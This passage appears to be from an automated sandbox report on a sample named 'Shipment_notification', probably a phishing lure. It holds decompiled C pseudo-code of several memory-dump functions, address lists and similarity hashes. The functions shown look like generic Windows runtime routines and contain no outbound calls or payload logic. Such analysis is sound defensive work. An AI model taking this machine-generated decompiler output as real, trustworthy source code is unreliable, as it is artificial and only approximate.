                                                                                0x01aff092
                                                                                0x01aff042
                                                                                0x00000000
                                                                                0x01aff042
                                                                                0x01afefb7
                                                                                0x01afefb9
                                                                                0x01afefbc
                                                                                0x01afefb0
                                                                                0x01afefb0
                                                                                0x00000000
                                                                                0x01afefbe
                                                                                0x01afefbe
                                                                                0x01afefc1
                                                                                0x00000000
                                                                                0x01afefc1
                                                                                0x01afefbc
                                                                                0x01afefaa
                                                                                0x01afef91

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                • Instruction ID: 71d57ef3e42c6928960bc4ac14ccfc5d4621d2f59553d1aab8e29a1d1d121ddc
                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                • Instruction Fuzzy Hash: 20510431A04245DFEB25CBACC1C07AEFBB1EF05324F1881ACE74593282D375A989C741
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB740D Relevance: .1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E01BB740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E01B3D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E01B2F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01B04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01B04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E01B2F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01B04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                0x01bb740d
                                                                                0x01bb740d
                                                                                0x01bb7412
                                                                                0x01bb7413
                                                                                0x01bb7416
                                                                                0x01bb7418
                                                                                0x01bb741c
                                                                                0x01bb741f
                                                                                0x01bb7422
                                                                                0x01bb7422
                                                                                0x01bb7428
                                                                                0x01bb742a
                                                                                0x01bb742a
                                                                                0x01bb7451
                                                                                0x01bb7432
                                                                                0x01bb744f
                                                                                0x01bb744f
                                                                                0x00000000
                                                                                0x01bb7434
                                                                                0x01bb7438
                                                                                0x01bb7443
                                                                                0x01bb7517
                                                                                0x01bb7517
                                                                                0x01bb751a
                                                                                0x01bb7535
                                                                                0x01bb7520
                                                                                0x01bb7527
                                                                                0x01bb752c
                                                                                0x01bb7531
                                                                                0x01bb7533
                                                                                0x00000000
                                                                                0x01bb7533
                                                                                0x00000000
                                                                                0x01bb7531
                                                                                0x01bb754b
                                                                                0x01bb754f
                                                                                0x01bb755c
                                                                                0x01bb755c
                                                                                0x01bb755f
                                                                                0x01bb7560
                                                                                0x01bb7561
                                                                                0x01bb7562
                                                                                0x01bb7563
                                                                                0x01bb7568
                                                                                0x01bb756a
                                                                                0x01bb756c
                                                                                0x01bb756d
                                                                                0x01bb756d
                                                                                0x01bb756f
                                                                                0x01bb7572
                                                                                0x01bb7574
                                                                                0x01bb7577
                                                                                0x01bb757c
                                                                                0x01bb757f
                                                                                0x00000000
                                                                                0x01bb7551
                                                                                0x01bb7551
                                                                                0x01bb7551
                                                                                0x01bb7553
                                                                                0x01bb7553
                                                                                0x01bb7449
                                                                                0x01bb7449
                                                                                0x01bb744c
                                                                                0x01bb744c
                                                                                0x00000000
                                                                                0x01bb744c
                                                                                0x01bb7443
                                                                                0x01bb750e
                                                                                0x01bb7514
                                                                                0x01bb7514
                                                                                0x01bb7455
                                                                                0x01bb7469
                                                                                0x01bb746d
                                                                                0x00000000
                                                                                0x01bb7473
                                                                                0x01bb7473
                                                                                0x01bb7476
                                                                                0x01bb7480
                                                                                0x01bb7484
                                                                                0x01bb748e
                                                                                0x01bb7493
                                                                                0x01bb7493
                                                                                0x01bb7496
                                                                                0x01bb7499
                                                                                0x01bb74a1
                                                                                0x01bb74b1
                                                                                0x01bb74b5
                                                                                0x00000000
                                                                                0x01bb74bb
                                                                                0x01bb74c1
                                                                                0x01bb74c1
                                                                                0x01bb74c4
                                                                                0x01bb74c5
                                                                                0x01bb74c6
                                                                                0x01bb74c7
                                                                                0x01bb74c8
                                                                                0x01bb74cd
                                                                                0x00000000
                                                                                0x01bb74d3
                                                                                0x01bb74d3
                                                                                0x01bb74d6
                                                                                0x01bb74d8
                                                                                0x01bb74db
                                                                                0x01bb74dd
                                                                                0x01bb74e0
                                                                                0x01bb74e7
                                                                                0x01bb74ee
                                                                                0x01bb74ee
                                                                                0x01bb74f4
                                                                                0x01bb74f9
                                                                                0x00000000
                                                                                0x01bb74fb
                                                                                0x01bb74fb
                                                                                0x01bb74fd
                                                                                0x01bb7500
                                                                                0x01bb7503
                                                                                0x01bb7505
                                                                                0x01bb7505
                                                                                0x01bb74f9
                                                                                0x00000000
                                                                                0x01bb74cd
                                                                                0x01bb74b5
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                • Instruction ID: 1b3edc78f5ec5368fa4d38ad7e18d370f39ac39626f876257e4d9c965337e4a4
                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                • Instruction Fuzzy Hash: 9B51A171500646DFDB1ACF18C980AA5BBB5FF85304F14C1EAE9089F292E7B1E945CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B12990 Relevance: .1, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E01B12990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x1bbff00);
				E01B3D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1ac1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E01B2E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1ac1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E01B651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x1ac166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01B12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = L01AF6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01B12C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01B12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01B12C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01B12ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E01B3D0D1(_t62);
				goto L28;
			}





















                                                                                0x01b12990
                                                                                0x01b12992
                                                                                0x01b12997
                                                                                0x01b129a3
                                                                                0x01b129a6
                                                                                0x01b129ab
                                                                                0x01b129ad
                                                                                0x01b129b2
                                                                                0x01b55c80
                                                                                0x01b129b8
                                                                                0x01b129b8
                                                                                0x01b129bb
                                                                                0x01b129c0
                                                                                0x01b129c5
                                                                                0x01b129c6
                                                                                0x01b129c6
                                                                                0x01b129cb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b129cd
                                                                                0x01b129d0
                                                                                0x01b129d9
                                                                                0x01b129db
                                                                                0x01b129dd
                                                                                0x01b12a7f
                                                                                0x01b12a84
                                                                                0x01b12a87
                                                                                0x01b12a89
                                                                                0x01b55ca1
                                                                                0x01b55ca3
                                                                                0x00000000
                                                                                0x01b12a8f
                                                                                0x01b12a8f
                                                                                0x00000000
                                                                                0x01b12a8f
                                                                                0x00000000
                                                                                0x01b129e3
                                                                                0x01b129e3
                                                                                0x01b129e3
                                                                                0x00000000
                                                                                0x01b129e3
                                                                                0x01b129dd
                                                                                0x00000000
                                                                                0x01b129db
                                                                                0x01b129e6
                                                                                0x01b129e9
                                                                                0x01b129eb
                                                                                0x01b129ed
                                                                                0x01b129f3
                                                                                0x01b129f5
                                                                                0x01b129f8
                                                                                0x01b129fa
                                                                                0x01b12a97
                                                                                0x01b12a9a
                                                                                0x01b12a9d
                                                                                0x01b12add
                                                                                0x00000000
                                                                                0x01b12a9f
                                                                                0x01b12aa2
                                                                                0x01b12aa5
                                                                                0x01b12aa8
                                                                                0x01b12aab
                                                                                0x01b55cab
                                                                                0x01b55caf
                                                                                0x01b55cc5
                                                                                0x01b55cda
                                                                                0x01b55cdc
                                                                                0x01b55cdf
                                                                                0x01b55ce5
                                                                                0x00000000
                                                                                0x01b55ceb
                                                                                0x01b55ced
                                                                                0x01b55cee
                                                                                0x00000000
                                                                                0x01b55cee
                                                                                0x01b55cb1
                                                                                0x01b55cb4
                                                                                0x01b55cb9
                                                                                0x01b55cbb
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbd
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbb
                                                                                0x01b12ab1
                                                                                0x01b12ab1
                                                                                0x01b12ac4
                                                                                0x01b12ac6
                                                                                0x01b12ac6
                                                                                0x00000000
                                                                                0x01b12ac6
                                                                                0x01b12aab
                                                                                0x00000000
                                                                                0x01b12a00
                                                                                0x01b12a09
                                                                                0x01b12a0e
                                                                                0x01b12a21
                                                                                0x01b12a24
                                                                                0x01b12a35
                                                                                0x01b12a3a
                                                                                0x01b12a3d
                                                                                0x01b12a42
                                                                                0x01b12a59
                                                                                0x01b12a59
                                                                                0x01b12a5c
                                                                                0x01b12a5f
                                                                                0x01b12a5f
                                                                                0x01b129fa
                                                                                0x01b129f3
                                                                                0x01b12a64
                                                                                0x01b12a64
                                                                                0x01b12a6b
                                                                                0x01b12a6b
                                                                                0x01b12a6d
                                                                                0x01b12a72
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b28c85a7d517b6b21d7f996b67c9a2ba6fb300d41efd12cb67489df94b03eed1
                                                                                • Instruction ID: ecb6f290d573bca6e20640698306bc7583b691e739c2e5b49a22464bebae0a84
                                                                                • Opcode Fuzzy Hash: b28c85a7d517b6b21d7f996b67c9a2ba6fb300d41efd12cb67489df94b03eed1
                                                                                • Instruction Fuzzy Hash: E4517F72A0020ADFDF29DF59C840ADEBBB6FF48350F6681E5E914A7224C3359952CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B14D3B Relevance: .1, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E01B14D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1bdd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E01B2FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1bd7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E01B2B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01B04620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E01AECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return L01B2B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E01B2F380(_t67 + 0xc, 0x1ac5138, 0x10) == 0) {
								 *0x1bd60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01B14F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(L01B14E70(0x1bd86b0, 0x1b15690, 0, 0) != 0) {
					_t46 = E01AECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                0x01b14d3b
                                                                                0x01b14d4d
                                                                                0x01b14d53
                                                                                0x01b14d58
                                                                                0x01b14d65
                                                                                0x01b14d6c
                                                                                0x01b14d71
                                                                                0x01b14d77
                                                                                0x01b14d7f
                                                                                0x01b14d8c
                                                                                0x01b14d8e
                                                                                0x01b14dad
                                                                                0x01b14db0
                                                                                0x01b14db7
                                                                                0x01b14db8
                                                                                0x01b14db9
                                                                                0x01b14dba
                                                                                0x01b14dbb
                                                                                0x01b14dc1
                                                                                0x01b14dc8
                                                                                0x01b14dcc
                                                                                0x01b14dd5
                                                                                0x01b14dde
                                                                                0x01b14ddf
                                                                                0x01b14de0
                                                                                0x01b14de1
                                                                                0x01b14de6
                                                                                0x01b14de7
                                                                                0x01b14de9
                                                                                0x01b14df3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56c7c
                                                                                0x01b56c8a
                                                                                0x01b56c8a
                                                                                0x01b56c9d
                                                                                0x01b56ca7
                                                                                0x01b56cac
                                                                                0x01b56cb2
                                                                                0x01b56cb9
                                                                                0x00000000
                                                                                0x01b56cbf
                                                                                0x01b56cbf
                                                                                0x00000000
                                                                                0x01b56cbf
                                                                                0x01b56cb9
                                                                                0x01b14dfb
                                                                                0x01b56ccf
                                                                                0x01b56cd3
                                                                                0x01b14e32
                                                                                0x01b14e39
                                                                                0x01b56ce0
                                                                                0x01b56cf2
                                                                                0x01b56cf2
                                                                                0x01b56ce0
                                                                                0x01b14e3f
                                                                                0x01b14e41
                                                                                0x01b14e51
                                                                                0x01b14e51
                                                                                0x01b14e03
                                                                                0x01b14e03
                                                                                0x01b14e09
                                                                                0x01b14e0f
                                                                                0x01b14e57
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b14e1b
                                                                                0x01b14e30
                                                                                0x01b14e5b
                                                                                0x01b14e5b
                                                                                0x00000000
                                                                                0x01b14e30
                                                                                0x01b14e11
                                                                                0x01b14e11
                                                                                0x01b14e16
                                                                                0x00000000
                                                                                0x01b14e16
                                                                                0x01b14e01
                                                                                0x00000000
                                                                                0x01b14e01
                                                                                0x01b14da5
                                                                                0x01b56c6b
                                                                                0x00000000
                                                                                0x01b14dab
                                                                                0x01b14dab
                                                                                0x00000000
                                                                                0x01b14dab

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d0bc53e62d0433210d7d274bb862bda0f9338ac4961cc57d26e0ef6994f817c
                                                                                • Instruction ID: 1a40e17786650819b7a04f1badaabb7cac6dc2543d3b82c101442258405d3d66
                                                                                • Opcode Fuzzy Hash: 6d0bc53e62d0433210d7d274bb862bda0f9338ac4961cc57d26e0ef6994f817c
                                                                                • Instruction Fuzzy Hash: D341C171A403189FEB3A9F18CC80F66B7A9EB45710F4100D9E9499B285DB70DD44CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B14BAD Relevance: .1, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E01B14BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x1bdd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E01AECC50(_t86);
					L11:
					return L01B2B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1bd8504
				E01B02280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E01B2FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E01B2B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01B04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E01AECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1bd8504
								E01AFFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01B14F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                0x01b14bad
                                                                                0x01b14bbf
                                                                                0x01b14bc2
                                                                                0x01b14bc6
                                                                                0x01b14bcd
                                                                                0x01b14bd9
                                                                                0x01b567fe
                                                                                0x01b56800
                                                                                0x01b14ccc
                                                                                0x01b14ccd
                                                                                0x01b14cb7
                                                                                0x01b14cc9
                                                                                0x01b14cc9
                                                                                0x01b14bdf
                                                                                0x01b14be5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b14beb
                                                                                0x01b14bef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b14bf5
                                                                                0x01b14bf9
                                                                                0x01b14c06
                                                                                0x01b14c0b
                                                                                0x01b14c17
                                                                                0x01b14c1c
                                                                                0x01b14c1f
                                                                                0x01b14c25
                                                                                0x01b14c33
                                                                                0x01b14c3d
                                                                                0x01b14c40
                                                                                0x01b14c43
                                                                                0x01b14c47
                                                                                0x01b14c4d
                                                                                0x01b14c53
                                                                                0x01b14c54
                                                                                0x01b14c55
                                                                                0x01b14c56
                                                                                0x01b14c5b
                                                                                0x01b14c5c
                                                                                0x01b14c63
                                                                                0x01b14c6b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b56776
                                                                                0x01b56784
                                                                                0x01b56784
                                                                                0x01b5679f
                                                                                0x01b567a7
                                                                                0x01b567af
                                                                                0x01b567ce
                                                                                0x00000000
                                                                                0x01b567b1
                                                                                0x01b567b7
                                                                                0x01b567b8
                                                                                0x01b567c1
                                                                                0x01b567d3
                                                                                0x01b567d9
                                                                                0x01b567dd
